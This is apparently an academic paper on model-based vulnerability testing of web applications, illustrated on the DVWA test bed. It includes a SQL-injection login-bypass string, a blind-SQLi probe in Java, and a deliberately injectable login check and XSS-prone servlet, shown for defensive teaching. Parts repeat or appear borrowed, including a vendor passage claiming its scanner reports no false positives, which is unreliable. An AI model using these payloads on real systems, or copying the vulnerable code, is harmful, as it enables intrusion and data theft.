Model-Based Vulnerability Testing

ABSTRACT

This paper deals with an original approach to automating Model-Based Vulnerability Testing (MBVT) for Web applications, which aims at improving the accuracy and precision of vulnerability testing. Today, Model-Based Testing techniques are mostly used to address functional features. The adaptation of such techniques to vulnerability testing raises novel issues in this research domain. In this paper, we describe the principles of our approach, which is based on a mixed modelling of the application under test: the specification captures some behavioural aspects of the Web application and includes vulnerability test purposes to drive the test generation algorithm. The approach is illustrated with the widely-used DVWA example. This report presents a model-based framework for testing security vulnerabilities. Security vulnerabilities are not only related to security functionalities at the application level but are also sensitive to implementation details; traditional model-based approaches, which elide implementation details, are therefore by themselves inadequate for testing security vulnerabilities. A framework is proposed that retains the advantages of model-based testing while exposing only the details relevant for vulnerability testing.


1. INTRODUCTION

1.1 Evolution

The continued growth of Internet usage as well as the development of Web applications foreground the challenges of IT security, particularly in terms of data confidentiality, data integrity and service availability. Thus, as stated in the annual barometer of Information Technology Managers' concerns, computer security and data protection are the primary concern for 72% of them. This growing risk arises from the mosaic of technologies used in current Web applications (e.g., HTML5), which increases the exposure to security breaches. The most common vulnerabilities listed in public vulnerability databases especially emphasize the lack of resistance to code injection, such as SQL Injection or Cross-Site Scripting (XSS), which have many variants; these appear at the top of current lists of Web application attacks. Application-level vulnerability testing is first performed by developers, but they often lack sufficient in-depth knowledge of recent vulnerabilities and related exploits. Such testing can also be carried out by companies specialized in security testing, for instance in penetration testing (pen-testing). These companies monitor the constant discovery of such vulnerabilities, as well as the constant evolution of attack techniques, but they mainly use manual approaches, which makes the dissemination of their techniques difficult and the impact of this knowledge low. Finally, Web application vulnerability scanners can be used to automate the detection of vulnerabilities, but since they often generate many false positive and false negative results, human verification and investigation are also required.

1.2 MBVT

Model-Based Vulnerability Testing (MBVT) for Web applications aims at improving the accuracy and precision of vulnerability testing, where accuracy means the capability to focus on the relevant parts of the software and precision means the capability to avoid both false positives and false negatives. MBVT adapts the traditional approach of Model-Based Testing (MBT) in order to generate vulnerability test cases for Web applications.

MBVT deeply renews the research questions around MBT: the targets are now negative tests (simulating attacks from a malicious agent) rather than positive tests. Automated test generation is driven by ad-hoc Test Purposes capturing vulnerability test patterns. At this stage of our research, this has already strongly impacted the core test generation engine of the MBT technology we are using (Smartesting CertifyIt), which was initially based on model coverage only.

We define a three-model framework: a model or specification of the key aspects of the application, a model of the implementation, and a model for automatic test case generation. This separation allows the test case generation process to cover contexts missed by other model-based approaches. Web applications have become a popular means of modern information interaction, which leads to a growing demand for them; at the same time, Web application vulnerabilities are increasing drastically. One of the most important software security practices used to mitigate this growing number of vulnerabilities is security testing, and Model-Based Vulnerability Testing (MBVT) is one such security testing approach, aiming at improving the accuracy and precision of vulnerability testing.

1.3 Focus on MBVT

The work presented in this paper aims to improve the accuracy and precision of vulnerability testing by means of models (inferred or manually designed) and test patterns, in order to avoid both false positives and false negatives. It also makes it possible to automate the vulnerability testing of Web applications by capturing vulnerability test patterns, which increases the detection of such vulnerabilities and ultimately improves the overall level of security.



1.4 Need of MBVT

Web application vulnerability scanners aim to detect vulnerabilities by injecting attack vectors. These tools generally include three main components [10]: a crawler module to follow web links and URLs in the web application in order to retrieve injection points; an injection module, which analyses the input points of web pages in order to inject attack vectors (such as code injection); and an analysis module to determine possible vulnerabilities based on the system response after attack vector injection. This approach allows testing an application against four types of attacks: blind and non-blind SQL Injection, and Reflected and Stored XSS.


2. WEB APPLICATION VULNERABILITY

Vulnerability refers to the inability to withstand the effects of a hostile environment. A window of vulnerability (WoV) is a time frame within which defensive measures are reduced, compromised or lacking. In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance. Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw. To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness. In this frame, vulnerability is also known as the attack surface. Vulnerability management is the cyclical practice of identifying, classifying, remediating, and mitigating vulnerabilities; this practice generally refers to software vulnerabilities in computing systems.

A security risk may be classified as a vulnerability, but using "vulnerability" with the same meaning as "risk" can lead to confusion. A risk is tied to the potential of a significant loss, and there are vulnerabilities without risk, for example when the affected asset has no value. A vulnerability with one or more known instances of working, fully implemented attacks is classified as an exploitable vulnerability, i.e. a vulnerability for which an exploit exists. The window of vulnerability is the time from when the security hole was introduced or manifested in deployed software to when access was removed, a security fix was made available or deployed, or the attacker was disabled (see zero-day attack). A security bug (security defect) is a narrower concept: there are vulnerabilities that are not related to software; hardware, site, and personnel vulnerabilities are examples of vulnerabilities that are not software security bugs. Constructs in programming languages that are difficult to use properly can also be a large source of vulnerabilities.

As the Web grows increasingly social in nature, it conversely becomes less secure. The Web Application Security Consortium (WASC) estimated in early 2009 that 87% of all Web sites were vulnerable to attack. Although some companies can afford to hire outside security analysts to test for exploits, not everyone has the resources to spend US$20,000 to US$40,000 for an outside security audit. Instead, organizations rely on their own developers to understand these threats and make sure their code is devoid of any such vulnerability.

2.1 Common Vulnerabilities

The two most common risks in the Web environment, injection (namely SQL injection, which lets attackers alter the SQL queries sent to a database) and cross-site scripting (XSS), are also two of the most dangerous (see the OWASP Top Ten Project). Injection attacks take advantage of improperly coded applications to insert and execute attacker-specified commands, enabling access to critical data and resources. XSS vulnerabilities exist when an application sends user-supplied data to a Web browser without first validating or encoding that content.

2.2 SQL Injection

SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application-layer attack techniques used today. It is the type of attack that takes advantage of improper coding of web applications, allowing a hacker to inject SQL commands into, say, a login form in order to gain access to the data held within the database. In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.

Web applications allow legitimate website visitors to submit and retrieve data to and from a database over the Internet using their preferred web browser. Databases are central to modern websites: they store the data needed for websites to deliver specific content to visitors and render information to customers, suppliers, employees and a host of other stakeholders. User credentials, financial and payment information, and company statistics may all reside within a database and be accessed by legitimate users through off-the-shelf and custom web applications. Web applications and databases allow you to regularly run your business.

SQL Injection is the hacking technique which attempts to pass SQL commands (statements) through a web application for execution by the backend database. If user input is not sanitized properly, web applications may be exposed to SQL Injection attacks that allow hackers to view information from the database or even wipe it out. Features such as login pages, support and product request forms, feedback forms, search pages, shopping carts and the general delivery of dynamic content shape modern websites and provide businesses with the means necessary to communicate with prospects and customers. These website features are all examples of web applications, which may be either purchased off-the-shelf or developed as bespoke programs, and they are all susceptible to SQL Injection attacks, which arise because the fields available for user input allow SQL statements to pass through and query the database directly.

Take a simple login page where a legitimate user would enter his username and password combination to enter a secure area, to view his personal details or to upload comments in a forum. When the legitimate user submits his details, an SQL query is generated from these details and submitted to the database for verification. If valid, the user is allowed access. In other words, the web application that controls the login page communicates with the database through a series of planned commands so as to verify the username and password combination; on verification, the legitimate user is granted appropriate access. Through SQL Injection, the hacker may input specifically crafted SQL commands with the intent of bypassing the login-form barrier and seeing what lies behind it.
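To make this concrete, the following minimal sketch (in Java with JDBC; the table and column names are illustrative, not taken from any particular application) shows how such a login check becomes injectable when the query is built by string concatenation, and how a parameterized query avoids the problem. Supplying a password such as anything' OR '1'='1 turns the concatenated WHERE clause into a tautology and bypasses the check.

    import java.sql.Connection;
    import java.sql.PreparedStatement;
    import java.sql.ResultSet;
    import java.sql.SQLException;
    import java.sql.Statement;

    public class LoginCheck {

        // Vulnerable variant: user-controlled strings are concatenated into the SQL
        // text, so a password such as  anything' OR '1'='1  turns the WHERE clause
        // into a tautology and bypasses the password check.
        static boolean vulnerableLogin(Connection db, String user, String pass) throws SQLException {
            String sql = "SELECT id FROM users WHERE login = '" + user
                       + "' AND password = '" + pass + "'";
            try (Statement st = db.createStatement(); ResultSet rs = st.executeQuery(sql)) {
                return rs.next();
            }
        }

        // Remediated variant: the same check with a parameterized query, where the
        // driver treats the injected quotes as plain data instead of SQL syntax.
        static boolean saferLogin(Connection db, String user, String pass) throws SQLException {
            String sql = "SELECT id FROM users WHERE login = ? AND password = ?";
            try (PreparedStatement ps = db.prepareStatement(sql)) {
                ps.setString(1, user);
                ps.setString(2, pass);
                try (ResultSet rs = ps.executeQuery()) {
                    return rs.next();
                }
            }
        }
    }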


Such a bypass is only possible if the inputs are not properly sanitised (i.e., made invulnerable) and are sent directly with the SQL query to the database. SQL Injection vulnerabilities provide the means for a hacker to communicate directly with the database. The technologies vulnerable to this attack are dynamic script languages including ASP, ASP.NET, PHP, JSP, and CGI. All an attacker needs to perform an SQL Injection attack is a web browser, knowledge of SQL queries and creative guesswork about important table and field names. The sheer simplicity of SQL Injection has fuelled its popularity.

2.2.1 Blind SQL Injection

Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the application's response. This attack is often used when the web application is configured to show generic error messages but has not mitigated the code that is vulnerable to SQL injection. When an attacker exploits SQL injection, the web application sometimes displays error messages from the database complaining that the SQL query's syntax is incorrect. Blind SQL injection is nearly identical to normal SQL Injection, the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL Injection vulnerability more difficult, but not impossible.

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data, but it will display differently depending on the result of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information have been established.
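As a hedged illustration of these true-or-false questions, the sketch below (Java 11 HttpClient; the target URL and the id parameter are assumptions made purely for the example) sends the same request twice, once with a condition that is always true and once with a condition that is always false, and compares the responses. A consistent difference between the two, without any visible error, suggests that the injected boolean is being evaluated inside the SQL query.

    import java.net.URI;
    import java.net.URLEncoder;
    import java.net.http.HttpClient;
    import java.net.http.HttpRequest;
    import java.net.http.HttpResponse;
    import java.nio.charset.StandardCharsets;

    public class BlindSqlProbe {

        // Illustrative only: the base URL and the "id" parameter are assumptions.
        static String page(HttpClient client, String idValue) throws Exception {
            String url = "http://localhost/app/item.php?id="
                       + URLEncoder.encode(idValue, StandardCharsets.UTF_8);
            HttpRequest request = HttpRequest.newBuilder(URI.create(url)).GET().build();
            return client.send(request, HttpResponse.BodyHandlers.ofString()).body();
        }

        public static void main(String[] args) throws Exception {
            HttpClient client = HttpClient.newHttpClient();
            // Two "questions": one condition that is always true, one that is always false.
            String whenTrue  = page(client, "1' AND '1'='1");
            String whenFalse = page(client, "1' AND '1'='2");
            // If the two answers differ while neither shows an SQL error, the application
            // is probably evaluating the injected boolean inside its query.
            System.out.println("responses differ: " + (!whenTrue.equals(whenFalse)));
        }
    }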

2.3 Cross-Site Scripting

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007. Its effects may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner. Cross-Site Scripting (XSS) attacks occur when:

a. Data enters a Web application through an untrusted source, most frequently a web request.

b. The data is included in dynamic content that is sent to a web user without being validated for malicious code.

The malicious content sent to the web browser often takes the form of a segment of JavaScript, but may also include HTML, Flash or any other type of code that the browser may execute. The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data such as cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site.

Historically, XSS was first found in applications that performed all data processing on the server side: user input (including the XSS vector) would be sent to the server and then sent back to the user as a web page. The need for an improved user experience made popular applications with the majority of their presentation logic running client-side in JavaScript and pulling data on demand from the server using AJAX. As this JavaScript code also processes user input and renders it in the web page content, a new sub-class of reflected XSS attacks, called DOM-based cross-site scripting, started to be found. In DOM-based XSS, the malicious data does not touch the web server; it is reflected by the JavaScript code entirely on the client side.

2.3.1 Stored XSS Attacks

Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, a message forum, a visitor log, or a comment field. The victim then retrieves the malicious script from the server when requesting the stored information. Stored cross-site scripting vulnerabilities arise when data originating from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes. Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application). Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

a. Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.

b. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt;, &gt;, etc.).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
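A minimal sketch of these two layers in Java is shown below; the validation patterns and the entity table are illustrative and deliberately incomplete, and a production application would normally rely on a well-tested validation and encoding library instead.

    import java.util.regex.Pattern;

    public class XssDefences {

        // Layer 1: strict, whitelist-style validation on arrival (illustrative patterns).
        private static final Pattern NAME  = Pattern.compile("[\\p{L} .'-]{1,64}");
        private static final Pattern YEAR  = Pattern.compile("\\d{4}");
        private static final Pattern EMAIL = Pattern.compile("[^@\\s]+@[^@\\s]+\\.[^@\\s]+");

        static boolean isValidName(String s)  { return NAME.matcher(s).matches(); }
        static boolean isValidYear(String s)  { return YEAR.matcher(s).matches(); }
        static boolean isValidEmail(String s) { return EMAIL.matcher(s).matches(); }

        // Layer 2: HTML-encode user input wherever it is copied into a response.
        static String htmlEncode(String s) {
            StringBuilder out = new StringBuilder(s.length());
            for (char c : s.toCharArray()) {
                switch (c) {
                    case '&':  out.append("&amp;");  break;
                    case '<':  out.append("&lt;");   break;
                    case '>':  out.append("&gt;");   break;
                    case '"':  out.append("&quot;"); break;
                    case '\'': out.append("&#39;");  break;
                    case '=':  out.append("&#61;");  break;
                    default:   out.append(c);
                }
            }
            return out.toString();
        }
    }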

2.3.2 Reflected XSS Attack

Reflected attacks are those where the injected code is reflected off the web server, such as in an error message, a search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as an e-mail message or another web server. When a user is tricked into clicking on a malicious link or submitting a specially crafted form, the injected code travels to the vulnerable web server, which reflects the attack back to the user's browser. The browser then executes the code because it came from a "trusted" server. Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message, submit the link to popular web sites that allow content authoring (for example in blog comments), or create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities depends upon the nature of the vulnerable application, the kinds of data and functionality it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other, more security-critical applications, then the vulnerability could be used to attack those applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.


In most situations where user-controllable data is copied into application responses, reflected cross-site scripting attacks can be prevented using the same two layers of defence described in Section 2.3.1: strict input validation on arrival, and HTML-encoding of user input at any point where it is copied into application responses.

2.4 Web Vulnerability Testing Needs to Be Automated

If web application security testing is not automated using a proven automated web application security scanner that can test for thousands of potential security flaws, some if not all of the serious web application vulnerabilities can be overlooked, and web security testing goes from being a seemingly benign IT project to a serious business liability. For example, imagine a custom-made web-based enterprise resource planning (ERP) system. Such a system would have hundreds, if not thousands, of visible entry points or attack surfaces, and many others "under the hood", that need to be checked for web application vulnerabilities such as SQL injection and cross-site scripting. Using realistic numbers, imagine the ERP system has 200 entry points that need to be checked against 100 different web application vulnerability variants. That means that the penetration tester needs to launch at least 20,000 security tests. If every test took just 5 minutes to complete, it would take a web security specialist around 208 business days to complete a proper web application security audit of such an ERP system. An automated web application security scanner such as Netsparker can scan much bigger custom ERP systems against a much larger number of web application vulnerability variants in a matter of hours. And unlike a human, an automated security scanner will not forget to scan an input parameter or get bored while trying different variations of a particular attack.

When doing a manual web application security test, you also restrict the testing to the vulnerabilities known to the penetration tester. On the other hand, when using an automated web vulnerability scanner such as Netsparker, you are making sure that all parameters are being checked against all types of web application security variants. By using Netsparker you are also ensuring that no false positives are reported in the web application security scan results, so you do not need to allocate time to validating detected vulnerabilities. Underscoring the importance of vulnerability testing automation are the popular information security studies: year after year, this research points to the same underlying causes of information risks, such as insufficient resources, lack of visibility, and uninformed management. Each of these elements can be addressed by automating security testing processes.


There is no perfect way to test for web security vulnerabilities. However, one thing is for sure: going about it manually and relying on staff expertise alone can be an exercise in futility that you cannot afford, because it might cost your business a lot of money and some web application vulnerabilities might go undetected. Do what is best for your business and integrate automation into the web vulnerability testing discussion and into the web application software development life cycle. When using an automated web application security scanner, you find more and better vulnerabilities. There are issues where automation will not help and manual testing needs to take place, but you do not want your security team to check an input for 100 different possible issues one HTTP request at a time, or by trying to analyze the output of a fuzzer. Free your team members' time so they can focus their efforts on the tasks that will actually benefit from their expertise.

3. MODEL-BASED VULNERABILITY TESTING

We propose to revisit and adapt the traditional approach of Model-Based Testing (MBT) in order to generate vulnerability test cases for Web applications. This adapted approach is called Model-Based Vulnerability Testing (MBVT). In this section, we first describe the specificities of the MBVT approach, then introduce the DVWA example used in the rest of the paper to illustrate it, and finally define the scope of the experiments conducted on this example.

3.1 Principles of MBVT Approach

MBT (Model-Based Testing) is an increasingly widely-used approach that has gained much interest in recent years, from academia as well as industry, especially by increasing and mastering test coverage (including support for certification) and by providing the degree of automation needed to shorten test execution time. MBT refers to a particular family of software testing techniques in which both test cases and expected results are automatically derived from a high-level model of the System Under Test (SUT). This high-level model, which defines the input of the MBT process, specifies the behaviours of the functions offered by the SUT, independently of how these functions have been implemented. The test cases generated from such models make it possible to validate the behavioural aspects of the SUT by comparing back-to-back the results observed on the SUT with those specified by the model. MBT thus aims to ensure that the final product conforms to the initial functional requirements. It promises higher quality and conformance to the respective functional requirements, at a reduced cost, through increased coverage (especially of stimuli combinations) and increased automation of the testing process. However, while this technique covers the functional requirements specified in the behavioural model of the SUT, it is also limited to this scope, since what is not modelled will not be tested.

Applying MBT techniques to vulnerability testing requires adapting both the modelling approach and the test generation computation. Within the traditional MBT process, which generates functional test cases, positive test cases are computed to validate the SUT with regard to its functional requirements. Within a vulnerability testing approach, negative test cases have to be produced: typically, attack scenarios to obtain data from the SUT in an unauthorized manner. The proposed process to perform vulnerability testing, depicted in Figure I, is composed of the following four activities:

Fig. I. Model-Based Vulnerability Test Process

i. Test purposes activity: consists in formalizing test purposes from vulnerability test patterns that the generated test cases have to cover;

ii. Modelling activity: aims to define a model that captures the behavioural aspects of the SUT in order to generate consistent (from a functional point of view) sequences of stimuli;

iii. Test Generation and Adaptation activity: consists in automatically producing abstract test cases from the artefacts defined during the two previous activities;

iv. Concretization, Test Execution and Observation activity: aims (a) to translate the generated abstract test cases into executable scripts, (b) to execute these scripts on the SUT, and (c) to observe the SUT responses and compare them to the expected results in order to assign the test verdict and automate the detection of vulnerabilities.

All these MBVT activities are supported by a dedicated tool chain, which is based on an existing MBT tool named CertifyIt, provided by the company Smartesting. This tool is a test generator that takes as input a test model, written with a subset of UML (called UML4MBT [1]), which captures the behaviour of the SUT. More concretely, a UML4MBT model consists of:

a. UML class diagrams to represent the static view of the system (with classes, associations, enumerations, class attributes and operations),

b. UML Object diagrams to list the concrete objects used to compute test cases and to define the initial state of the SUT, and

c. state diagrams (annotated with OCL constraints) to specify the dynamic view of the SUT. Each generated test case is typically an abstract sequence of high-level actions from the UML4MBT models.


These generated test sequences contain not only the sequence of stimuli to be executed but also the expected results (used to perform the observation activity), obtained by resolving the associated OCL constraints.

4. DAMN VULNERABLE WEB APPLICATION

In order to evaluate the effectiveness and efficiency of our approach, we have applied it to a Web application called DVWA (Damn Vulnerable Web Application). This open-source Web application test bed is based on PHP/MySQL. It can also be used to evaluate web security testing tools, such as vulnerability scanners. DVWA embeds several vulnerabilities, notably SQL Injection and Blind SQL Injection, and Reflected and Stored XSS; these vulnerabilities are commonly used to attack current Web applications. Each vulnerability has a dedicated menu item leading to a dedicated page. DVWA also embeds three security levels: low, medium, and high. Each level carries different security protections: the lowest level has no protection at all, the medium level is a refined version but is still quite vulnerable, and the highest level is a properly secured version. Users choose which level they want to work with through the application, and it is also possible to view and compare the source code of each security level.

To ease understanding, we focus on the Reflected XSS attack (RXSS). It is one of the major breaches because it is widely used and because its exploitation leads to severe risks (such as identity spoofing). As described in Section 2.3.2, reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way, allowing attacker-supplied JavaScript to execute within the victim's browser in the context of that user's session with the application.

An XSS attack targets end-users. This kind of attack happens when a user input (form field, URL parameter, cookie value) is used by the server to produce a response. An attacker injects malicious data (such as a script, typically written in JavaScript, which will be executed by an end-user's browser) into the Web application through a user input. A lack of user input validation leads to unsecured applications. An XSS attack is either Reflected (the response containing malicious data is immediately produced and sent back to the end-user) or Stored (the malicious data is saved in the application's database and retrieved later, in another context). We focus on RXSS vulnerabilities through form fields.
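As a purely illustrative sketch (a hypothetical Java servlet, not DVWA's actual PHP code), the handler below copies a request parameter into its HTML response without validation or encoding, which is exactly the pattern a reflected XSS attack exploits: a request such as ?name=<script>...</script> is executed by the victim's browser.

    import java.io.IOException;
    import javax.servlet.http.HttpServlet;
    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;

    // Hypothetical reflected-XSS-prone handler: the "name" parameter is echoed into
    // the page without any validation or HTML-encoding.
    public class GreetingServlet extends HttpServlet {
        @Override
        protected void doGet(HttpServletRequest request, HttpServletResponse response)
                throws IOException {
            String name = request.getParameter("name");                // untrusted input
            response.setContentType("text/html");
            response.getWriter().println("<p>Hello " + name + "</p>"); // reflected unencoded
        }
    }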

5. MBVT APPROACH ON DVWA

5.1 Formalizing Vulnerability Test Patterns into Test Purposes

Vulnerability Test Patterns (vTP) are the initial artefacts of our approach. A vTP expresses the testing needs and procedures allowing the identification of a particular breach in a Web application. There are as many vTPs as there are types of application-level breaches. The characteristics of a Vulnerability Test Pattern are: its name; its description; its testing objectives; its prerequisites (specifying the conditions and knowledge required for a correct execution); its procedure (specifying its modus operandi); its observations and its oracle (specifying which information has to be monitored in order to identify the presence of an application-level breach); its variants (specifying alternatives regarding the means in use, the malicious data, or what is observed); its known issues (specifying any limitation or problem, e.g. technical, restricting its usage); its affiliated vTPs (listing its correlated vTPs); and its references (to public resources dealing with application-level vulnerability issues, such as CVE, CWE, OWASP, CAPEC, etc.). Figure II presents the Vulnerability Test Pattern of the Reflected XSS attack.

Fig. II vTP of Reflected XSS attacks

For this vTP, variants of malicious data are defined during the modelling activity, while variants of the procedure are defined during the adaptation and execution activity. The initial procedure is defined in a test purpose. A test purpose is a high-level expression that formalizes a test intention linked to a testing objective, used to drive the automated test generation on the behavioural model. In the MBVT context, we propose to use test purposes to formalize vTPs. Basically, a test purpose is a sequence of important stages to reach. A stage is a set of operations or behaviours to use, and/or a state to reach. Transforming the sequence of stages into a complete test case, based on the model behaviour and constraints, is left to the MBT technology. Furthermore, at the beginning of a test purpose, the test engineer can define iterators. Iterators are used in stages in order to introduce context variations, and each combination of possible values of the iterators produces a specific test case. Figure III shows the test purpose formalizing the vTP of Figure II.

Fig. III Test purpose formalizing the vTP of Fig. II

This schema specifies that for all sensitive web pages, for all malicious data enabling the detection of an RXSS breach, and for all security levels of DVWA, it is required to:

a. use any operation to activate the sensitive page with the required security level,

b. inject the malicious data in all the user inputs of the page,

c. check whether the page is sensitive to the RXSS attack.

The three ALL* keywords are enumerations of values, defined by the security test engineer, allowing him/her to control the final number of test cases.

We use a second test purpose, similar to the presented one, which makes it possible to target precisely which user input fields have to be injected. This test purpose gives the security engineer finer control. The modifications are: (a) one added iterator targeting sensitive fields, and (b) the use of the operation injectField instead of the operation injectAllFields. The combinatorial effect of the iterators is sketched below.
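The following sketch illustrates, in plain Java, how the iterators of a test purpose expand into test targets; the page name is an assumed placeholder, while the malicious data variants and security levels are those described in Sections 4 and 5.2. With one sensitive page, four malicious data and three security levels, the expansion yields the 12 test targets per test purpose reported in Section 5.3.

    import java.util.List;

    public class TestTargetExpansion {
        public static void main(String[] args) {
            // Iterator values: the page name is a placeholder, the malicious data and
            // security levels mirror the model described in Section 5.2.
            List<String> pages     = List.of("XSS_REFLECTED_PAGE");
            List<String> malicious = List.of("RXSS_DUMMY", "RXSS_COOKIE1",
                                             "RXSS_COOKIE2", "RXSS_WAF_EVASION");
            List<String> levels    = List.of("LOW", "MEDIUM", "HIGH");

            int target = 0;
            for (String page : pages)
                for (String data : malicious)
                    for (String level : levels)
                        // Each combination becomes one test target, hence one abstract test case.
                        System.out.printf("target %2d: page=%s, data=%s, level=%s%n",
                                          ++target, page, data, level);
            // 1 page x 4 malicious data x 3 levels = 12 targets for this test purpose.
        }
    }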

5.2 Modelling

The modelling activity produces a model based, on the one hand, on the functional specifications of the application and, on the other hand, on the test purposes which will be applied to it. We present in the following the UML diagrams used (class, object and state diagrams) and their respective usages in the context of our MBVT approach. Class diagrams specify the static aspect of the model by defining the abstract objects of the SUT. The class diagrams of our approach share many similarities with traditional MBT: classes model business objects (notably, the SUT class models the system under test and defines the points of control and observation); associations model relations between business objects; enumerations model sets of abstract values, and literals model each value; class attributes model evolving characteristics of business objects; class operations model points of control and observation of the SUT.


Fig. IV Class diagram of the SUT structure, for our MBVT approach

Nevertheless, our MBVT approach differs from traditional MBT by:

a. two additional classes (page and field) and their relations, which respectively model the general structure of the application and the user input fields potentially used to inject malicious data;

b. some additional operations, coming from the test purposes, which model the means to exercise and observe the attack;

c. one additional enumeration which models the malicious data injected in user input fields.

The UML state diagram graphically specifies the behavioural aspect of the SUT, modelling the navigation between pages of the Web application. States model Web pages, and transitions model the available navigations between these Web pages. Triggers of transitions are the UML operations of the SUT class. Guards of transitions precisely define the context of firing. Effects of transitions precisely define the modifications induced by the execution of transitions.

The UML object diagram models the initial state of the SUT by instantiating class diagram elements: instances model business entities available at the initial state of the SUT, and links model relations between these entities. In our MBVT approach, the object diagram models the Web pages of the application and the user input fields of these pages. Figure V presents the class model of the DVWA example.

Fig.V Class model of DVWA


The additional class User models the potential users of the application; the class attributes message and security level respectively model the application feedback and the security level; the first five operations model the necessary and sufficient functional subset of the application allowing access to the tested pages with the relevant level of security; the operations injectAllFields and injectField, which are keywords coming from the test purposes, model the injection of malicious data into all or part of the user input fields of Web pages; the operation checkMessage models the observation of the message attribute; and the operation checkRXSSAttack models the observation of the attack and serves as the oracle. Moreover, regarding the static aspect of the model, some enumeration literals model malicious data variants: RXSS_DUMMY is a basic variant, RXSS_COOKIE1 and RXSS_COOKIE2 are two variants allowing the retrieval of private user information, and RXSS_WAF_EVASION models a variant allowing some web application firewall techniques to be bypassed. For the time being, we only deal with a few malicious data variants; the main concern is to experiment with our approach and evaluate whether it is realistic.

Figure VI presents the state diagram, which models the behaviour of DVWA. It defines precedences between pages: identification is required before reaching any other page of the application.

Fig.VI State diagram of DVWA Example

Figure VII presents the initial state of the DVWA model. It specifies (i) one user, with its credentials, and (ii) the pages and user input fields of DVWA.


Fig.VII Object diagram of DVWA

5.3 Test Generation

The main purpose of the test generation activity is to produce test cases from both the model and the test purposes. Three phases compose this activity. The first phase transforms the model and the test purposes into elements usable by the Smartesting CertifyIt MBT tool. Notably, test purposes are transformed into test targets, a test target being a sequence of intermediate objectives used by the symbolic generator: the sequence of stages of a test purpose is mapped to a sequence of intermediate objectives of a test target. Furthermore, this first phase manages the combination of values between the iterators of the test purposes, such that one test purpose produces as many test targets as there are possible combinations. The second phase produces the abstract test cases from the test targets. This phase is left to the test case generator. An abstract test case is a sequence of steps, where a step corresponds to a completely valued operation call, an operation call representing either a stimulation or an observation of the SUT. Each test target produces one test case that (i) respects the sequence of intermediate objectives and (ii) satisfies the model constraints. Figure VIII presents a test case obtained from the test purpose of Figure III.

Fig.VIII Abstract test case example

The first five steps of this test case correspond to the first stage of the test purpose. Finally, the third phase exports the abstract test cases into the execution environment. In our case, it consists of:

i. creating a JUnit test suite, where each abstract test case is exported as a JUnit test case, and

ii. creating an interface. This interface defines the prototype of each operation of the SUT.

